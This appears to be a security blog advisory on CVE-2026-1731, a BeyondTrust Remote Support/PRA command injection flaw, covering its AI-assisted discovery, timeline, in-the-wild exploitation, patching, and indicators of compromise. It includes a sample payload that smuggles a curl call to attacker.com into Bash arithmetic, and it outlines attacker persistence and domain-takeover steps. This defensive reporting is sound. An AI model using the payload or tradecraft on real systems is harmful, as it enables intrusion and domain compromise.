On February 6, 2026, BeyondTrust published an emergency security advisory (BT26-02) for CVE-2026-1731, a critical OS command injection vulnerability in its Remote Support and Privileged Remote Access (PRA) products. CVSS score: 9.9 out of 10. No authentication required. Trivial to exploit. And most importantly: a public proof-of-concept available since February 10, with attacks confirmed in the wild less than 24 hours after its release.
What makes this CVE particularly interesting beyond its technical severity is how it was discovered: it was identified on January 31, 2026 by Harsh Jaiswal and the Hacktron AI team through AI-assisted variant analysis. AI is no longer content with generating code or drafting reports: it now finds zero-days in critical enterprise software.
Here is a full breakdown of this flaw, its timeline, its exploitation in the wild, and the measures to take immediately if you operate BeyondTrust instances.
BeyondTrust: a major player in secure remote access
For those unfamiliar with the vendor, BeyondTrust provides privileged remote access solutions used by more than 20,000 organizations across over 100 countries, including 75% of the Fortune 100. Two products are at the heart of this issue:
- Remote Support (RS): lets technical support teams take remote control of workstations and servers to assist users or intervene on infrastructure
- Privileged Remote Access (PRA): provides secure remote access to critical systems for administrators and external contractors, with session recording and privilege management
These appliances, historically known as Bomgar, are deployed either as SaaS or on-premises (the well-known B-series appliances). It is this second deployment mode that causes the most problems: roughly 8,500 on-premises instances are directly exposed on the Internet, and many run on end-of-life hardware that complicates updates.
The historical context adds to the urgency. In late 2024, the Chinese group Silk Typhoon exploited two BeyondTrust flaws (CVE-2024-12356 and CVE-2024-12686) to compromise the U.S. Department of the Treasury. CVE-2026-1731 hits exactly the same type of attack surface.
Anatomy of the vulnerability
Classification and attack vector
CVE-2026-1731 is classified as an OS command injection (CWE-78: Improper Neutralization of Special Elements used in an OS Command). The attacker sends specially crafted requests to the BeyondTrust appliance, without any prior authentication, and gains execution of system commands in the context of the service user.
The CVSS characteristics speak for themselves:
CVE-2026-1731
CVSSv4 score: 9.9 / 10 (Critical)
Type: OS Command Injection (CWE-78)
Vector: Network (AV:N)
Complexity: Low (AC:L)
Privileges: None (PR:N)
Interaction: None (UI:N)
Impact: Confidentiality, Integrity, Availability (CIA) = High
In plain terms: anyone on the Internet can send an HTTP request to a vulnerable BeyondTrust instance and execute system commands. No password, no user interaction, low exploitation complexity.
The vulnerable endpoint: get_portal_info
The flaw lies in the get_portal_info endpoint, accessible via WebSocket on the /nw path. It is the same endpoint that was exploited in CVE-2024-12356, the one used by Silk Typhoon against the U.S. Treasury. The root cause is an unsafe Bash arithmetic evaluation in a script accessible via WebSocket.
Concretely, parameters supplied by the user in the WebSocket request are passed without sufficient sanitization to a Bash evaluation. An attacker can inject arbitrary commands through constructs like:
# Conceptual example of injection via Bash arithmetic evaluation
# User input is passed to a $(( )) expression
# The attacker injects through Bash $() syntax
# Vulnerable arithmetic evaluation (pseudocode)
result=$(( ${user_input} ))
# Injection payload:
# user_input = "1$(curl http://attacker.com/callback)"
# Bash first resolves the $() command substitution
# then attempts the arithmetic evaluation
# The server executes:
result=$(( 1$(curl http://attacker.com/callback) ))
# → curl runs with the privileges of the BeyondTrust process
The subtlety of this class of vulnerability is that Bash arithmetic evaluation ($(( ))) resolves command substitutions ($()) before computing the result. A developer who thinks they are only handling numbers ends up executing system commands.
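As an added illustration (not code from the advisory or from BeyondTrust), the same unsafe shape next to a hardened version that allowlists the value before it ever reaches the arithmetic evaluator; the function names and the sample inputs are constructed:

```shell
#!/bin/sh
# Added example, not BeyondTrust's code: the unsafe arithmetic pattern the
# article describes, beside a hardened version that fails closed on anything
# that is not a plain decimal integer.

# Vulnerable shape: the caller's text is interpolated straight into $(( )),
# so the arithmetic evaluator, not the developer, decides what it means.
unsafe_next_value() {
    echo $(( $1 + 1 ))
}

# Hardened shape: allowlist before evaluation. Any unexpected character,
# including "$", "(", "[", ";" and backticks, fails validation, so no
# attacker-controlled text is ever handed to the evaluator.
is_decimal() {
    case "$1" in
        '' | *[!0-9]* | 0?*) return 1 ;;   # empty, non-digit, or leading zero (octal ambiguity)
    esac
    [ "${#1}" -le 9 ]                      # bounded length keeps the value in integer range
}

safe_next_value() {
    is_decimal "$1" || return 1
    echo $(( $1 + 1 ))
}

# Counts how many of the given values the hardened function refuses.
count_rejected() {
    rejected=0
    for value in "$@"; do
        safe_next_value "$value" >/dev/null || rejected=$((rejected + 1))
    done
    echo "$rejected"
}

# Constructed inputs: two benign values plus the shapes the article describes
# (command substitution, the array-subscript variant, a shell metacharacter).
for value in 443 0 '1$(id)' 'a[$(id)]' '443;id' 0443; do
    if result=$(safe_next_value "$value"); then
        echo "accepted: $value -> $result"
    else
        echo "rejected: $value"
    fi
done
```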
Affected versions and fixes
The impacted versions and available fixes:
Product                     Vulnerable versions   Fixed version
─────────────────────────   ───────────────────   ──────────────────────────
Remote Support (RS)         ≤ 25.3.1              25.3.2 (patch BT26-02-RS)
Privileged Remote Access    ≤ 24.3.4              25.1.1 (patch BT26-02-PRA)
Important note: PRA versions 25.1 and above are not affected. The problem mainly concerns on-premises deployments that have not been updated for several months, which is unfortunately common with hardware appliances.
Discovery by AI: a turning point for vulnerability research
The most remarkable aspect of this CVE is how it was discovered. On January 31, 2026, Harsh Jaiswal (co-founder of Hacktron AI) and Mohan Sri Rama Krishna Pedhapati identified the flaw using an AI-assisted variant analysis technique.
The principle of variant analysis is well known in security: when a vulnerability is discovered in a software component, you look for similar patterns in the same codebase or in other products. Historically, this is manual, methodical, and time-consuming work. The innovation here is the AI automation of this process.
Hacktron AI describes its approach as autonomous scans designed to discover classes of vulnerabilities and their variants at scale across enterprise software. Starting from CVE-2024-12356 (the flaw exploited by Silk Typhoon), their system identified that the same injection pattern existed in an unpatched variant of the same endpoint.
The implications are considerable:
- Faster discovery: what used to take weeks of manual auditing can be done in hours by an automated system
- Systematic coverage: AI can test thousands of payload variations across every accessible endpoint, where a human researcher would focus on the most likely ones
- Large-scale variant analysis: a single known CVE can serve as a starting point to discover dozens of similar flaws in related products
- Dual-use risk: if AI lets legitimate researchers find flaws faster, it offers the same advantage to attackers
This is a strong signal for the industry. AI agent security is already a hot topic, but here it is AI as both an offensive and defensive vulnerability research tool that takes on a concrete dimension. We move from theory to proof by CVE.
Full incident timeline
The timeline of this CVE is a textbook case of how quickly a critical vulnerability goes from discovery to mass exploitation:
Date                Event
──────────────────  ──────────────────────────────────────────────────
January 31, 2026    Discovered by Harsh Jaiswal / Hacktron AI via AI-assisted variant analysis
February 2, 2026    BeyondTrust automatically patches all SaaS (cloud) instances
February 6, 2026    Publication of security advisory BT26-02; CVE-2026-1731 assigned
February 9, 2026    Rapid7 publishes a detailed technical analysis; ~11,000 exposed instances identified
February 10, 2026   Proof-of-concept published on GitHub; first exploitation attempts observed
February 11, 2026   GreyNoise detects mass reconnaissance; 86% of scans originate from a single IP
February 12, 2026   Rapid7 publishes a full PoC; two distinct exploitation tools identified
February 13, 2026   Active exploitation confirmed by Arctic Wolf; CISA adds the CVE to the KEV catalog; SimpleHelp RMM deployed on targets
February 16, 2026   Widespread exploitation underway
Less than 10 days between the patch release and active exploitation in the wild. Less than 24 hours between the PoC release and the first attacks. This is the standard tempo of critical CVEs in 2026: the grace period to patch no longer exists.
Exploitation in the wild: what attackers are doing
Mass and targeted reconnaissance
GreyNoise documented the reconnaissance phase with remarkable precision. The key observations:
- A dominant actor: a single IP address accounts for 86% of scan sessions, operating from a commercial VPN based in Frankfurt and active since 2023
- Non-standard port targeting: the attackers do not just scan port 443. They systematically test clusters of non-standard ports, knowing that companies often move BeyondTrust onto custom ports
- Technical fingerprint: JA4+ analysis reveals an MSS of 1358 (instead of the standard 1460), confirming VPN encapsulation. 100% of sessions show Linux stack characteristics
- Two distinct exploitation tools: a lightweight 5-header HTTP variant shared between the main IPs, and a 7-header variant used by 10 single-session scanners
Critical point: these actors are not novice opportunists. Their GreyNoise profiles show that they simultaneously target SonicWall, MOVEit Transfer, Log4j, Sophos firewalls, and conduct SSH brute-force and default IoT credential testing. This is a large-scale compromise operation.
Post-exploitation: from RCE to domain control
Arctic Wolf documented the post-exploitation tactics observed on compromised instances. The attack pattern is methodical:
Phase 1: Initial exploitation
→ Command injection via get_portal_info (WebSocket /nw)
→ Execution in the context of the SYSTEM account
Phase 2: Persistence
→ Deployment of SimpleHelp RMM (legitimate remote management tool)
→ Renamed binaries (e.g., "remote access.exe") in ProgramData
→ Execution via Bomgar processes under the SYSTEM account
Phase 3: Lateral movement
→ Creation of domain accounts via "net user"
→ Addition to "Enterprise Admins" and "Domain Admins" groups
→ Active Directory scan via AdsiSearcher
→ Deployment of SimpleHelp on other machines via PsExec
→ Impacket SMBv2 requests across compromised environments
Phase 4: Final objective
→ Full control of the Active Directory domain
→ Ideal position for ransomware deployment
The choice of SimpleHelp as a persistence tool is tactically smart: it is legitimate remote management software, less likely to trigger antivirus alerts than a classic reverse shell.
Checking and remediating your instances
Identify vulnerable instances
The first step is to determine whether you operate BeyondTrust instances and which version they are running:
# 1. Scan your network to find BeyondTrust instances
# BeyondTrust usually exposes an identifiable web portal
nmap -sV -p 443,8443,4430 --script http-title your-network/24
# 2. Check the version via the admin interface
# Log in to https://your-instance/login
# Menu: Configuration → About
# Or via the API (if accessible):
curl -sk https://your-instance/api/v1/version
# 3. Check exposure from the Internet
# Use Shodan or Censys to identify your assets
# Shodan search: "BeyondTrust" or "Bomgar"
# Censys identified ~190,832 exposed web properties
# 4. Check logs for exploitation attempts
# Look for suspicious patterns in the BeyondTrust logs
grep -rE "get_portal_info|/nw.*WebSocket" /var/log/beyondtrust/
# Look for abnormal WebSocket connections
grep -i "websocket" /var/log/nginx/access.log | grep "/nw"
Apply the fix
For on-premises instances, the patch is applied via the appliance admin interface:
# BeyondTrust on-premises update procedure
# ================================================
1. Access the /appliance interface of your instance
https://your-instance/appliance
2. "Updates" section → Check for available updates
3. Apply the BT26-02-RS patch (Remote Support)
or BT26-02-PRA (Privileged Remote Access)
4. Reboot the appliance after applying the patch
5. Verify that the version is:
- Remote Support ≥ 25.3.2
- PRA ≥ 25.1.1
# WARNING: legacy appliances
# RS < 21.3 and PRA < 22.1 versions require
# a sequential update BEFORE you can
# apply the BT26-02 patch.
# Contact BeyondTrust support for assistance.
Immediate mitigation measures
While waiting for patching, or if you cannot update immediately:
# 1. Restrict network access to the BeyondTrust appliance
# Limit to trusted IPs only
# Example with iptables:
iptables -A INPUT -p tcp --dport 443 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
# 2. Block WebSocket connections to /nw if not used
# Nginx reverse proxy configuration:
# location /nw {
# deny all;
# return 403;
# }
# 3. Monitor for indicators of compromise
# Look for suspicious processes
ps aux | grep -iE "simplehelp|remote.access|bomgar"
# Check for recently created AD accounts
# PowerShell:
# Get-ADUser -Filter {Created -gt "2026-02-10"} -Properties Created
# Check for additions to administrator groups
# Get-ADGroupMember "Domain Admins" | Select Name, SID
# 4. Enable detailed logging
# In the BeyondTrust interface:
# Configuration → Security → Enable detailed logging
To strengthen the security of your remote access more generally, the article Securing SSH: best practices covers the fundamentals of securing remote access, applicable well beyond the SSH protocol alone.
Indicators of compromise
If your BeyondTrust instances were exposed before patching, actively search for these indicators:
Network indicators:
─────────────────────────────────────────────────────────
• Abnormal WebSocket connections to /nw (port 443)
• Callbacks to OAST domains (out-of-band testing)
• MSS of 1358 in TCP connections (VPN signature)
• Impacket SMBv2 requests between internal machines
System indicators:
─────────────────────────────────────────────────────────
• Renamed SimpleHelp binaries in C:\ProgramData
• "remote access.exe" processes launched via Bomgar/SYSTEM
• User accounts created after February 10, 2026
• Additions to "Domain Admins" / "Enterprise Admins" groups
• PsExec executions toward domain machines
Reconnaissance indicators (GreyNoise):
─────────────────────────────────────────────────────────
• Scans on non-standard ports (not just 443)
• HTTP requests matching the two tool variants profiled by GreyNoise (5-header and 7-header)
• Combined BeyondTrust + SonicWall + MOVEit scans
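An added triage script, not BeyondTrust's or GreyNoise's code, that applies two of these indicators (and the log check from the identification procedure above) to reverse-proxy access logs. It assumes a custom nginx log_format of '$remote_addr $server_port "$request" $status "$http_upgrade"', treats 10.0.0.0/8 as the trusted admin range, and runs on constructed sample lines:

```shell
#!/bin/sh
# Added example (not vendor code): flag WebSocket upgrades to /nw from outside
# the trusted range, and sources probing several listener ports on this host.
# Assumed log_format: '$remote_addr $server_port "$request" $status "$http_upgrade'

# Constructed sample lines; 10.0.0.0/8 stands in for the trusted admin network.
SAMPLE_LOG='10.0.5.20 443 "GET /nw HTTP/1.1" 101 "websocket"
203.0.113.7 443 "GET /nw HTTP/1.1" 101 "websocket"
203.0.113.7 443 "GET /nw HTTP/1.1" 101 "websocket"
203.0.113.7 8443 "GET /nw HTTP/1.1" 101 "websocket"
198.51.100.9 443 "GET /login HTTP/1.1" 200 "-"
203.0.113.7 4430 "GET / HTTP/1.1" 404 "-"
198.51.100.9 443 "GET /nw HTTP/1.1" 101 "websocket"'

# Source IPs outside 10.0.0.0/8 that completed a WebSocket upgrade to /nw,
# with a hit count, busiest first. Reads the log on stdin.
external_nw_upgrades() {
    awk '$4 ~ /^\/nw(\/|\?|$)/ && $7 ~ /websocket/ && $1 !~ /^10\./ { n[$1]++ }
         END { for (ip in n) print ip, n[ip] }' | sort -k2,2nr -k1,1
}

# Sources that touched at least MIN distinct listener ports (default 3): the
# multi-port probing GreyNoise attributed to the dominant scanner.
port_sweeps() {
    awk -v min="${1:-3}" '{ key = $1 SUBSEP $2
                            if (!(key in seen)) { seen[key] = 1; ports[$1]++ } }
         END { for (ip in ports) if (ports[ip] >= min) print ip, ports[ip] }' | sort -k1,1
}

# Wrappers over the embedded sample so results can be checked without a real log.
sample_nw_upgrades() { printf '%s\n' "$SAMPLE_LOG" | external_nw_upgrades; }
sample_port_sweeps() { printf '%s\n' "$SAMPLE_LOG" | port_sweeps "${1:-3}"; }

echo "External WebSocket upgrades to /nw:"; sample_nw_upgrades
echo "Sources probing 3+ ports:"; sample_port_sweeps 3
```

On a real appliance the two filters read a log file instead of the sample, e.g. `external_nw_upgrades < /var/log/nginx/access.log`, after the log_format has been adjusted to match.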
Lessons and outlook
The recurrence of BeyondTrust flaws
This is the third major critical flaw in BeyondTrust products in less than 14 months. After CVE-2024-12356 and CVE-2024-12686 exploited by Silk Typhoon, CVE-2026-1731 hits the same endpoint (get_portal_info) with the same type of vulnerability. This raises legitimate questions about the vendor's code review and internal security processes.
For organizations that depend on BeyondTrust, this is a wake-up call: these appliances must be treated as priority targets for attackers and secured accordingly, regardless of the trust placed in the vendor.
AI accelerates both sides
The discovery of this CVE through AI-assisted variant analysis illustrates a paradigm shift in vulnerability research. Automated tools make it possible to cover an incomparably larger analysis surface than a manual audit. But this capability is available to everyone, legitimate researchers and attackers alike.
The window between a patch release and active exploitation shrinks with every new critical CVE. In 2024, we talked about a few weeks. In 2026, it is less than 24 hours after a PoC is released. Security teams that rely on a monthly patching cycle are structurally behind.
Network appliances remain the weak link
BeyondTrust, SonicWall, Fortinet, Ivanti, Palo Alto: the list of network appliance vendors hit by critical flaws keeps growing. These devices combine all the risk factors:
- Direct Internet exposure by design
- Elevated privileges over the infrastructure they protect
- Slow update cycles (hardware appliances, availability constraints)
- Unanticipated end of life for older hardware models
- Limited visibility into what actually runs on the appliance
The Zero Trust model makes full sense here: never trust a network device as your sole layer of security, even when it is itself supposed to be a security tool.
Conclusion
CVE-2026-1731 alone concentrates several of the underlying trends in cybersecurity in 2026: critical network appliances as a primary attack vector, an exploitation window shrinking to a few hours, and the emergence of AI as an accelerator of vulnerability research, for better and for worse.
The key takeaways:
- Patch immediately all on-premises BeyondTrust RS and PRA instances to versions 25.3.2 (RS) and 25.1.1 (PRA)
- Check for indicators of compromise if your instances were exposed before the fix, in particular the presence of SimpleHelp RMM and recently created AD accounts
- Isolate BeyondTrust appliances behind strict network access controls and do not expose them directly on the Internet without filtering
- Plan the migration of end-of-life Bomgar B-series appliances that can no longer receive security fixes
- Actively monitor upcoming BeyondTrust CVE releases, since the same endpoint has been compromised three times in 14 months
And more broadly, this CVE is a reminder of an uncomfortable reality: the tools meant to secure remote access have themselves become one of the most targeted attack surfaces. Security cannot be delegated to an appliance. It is built in depth, verified continuously, and updated in hours, not weeks.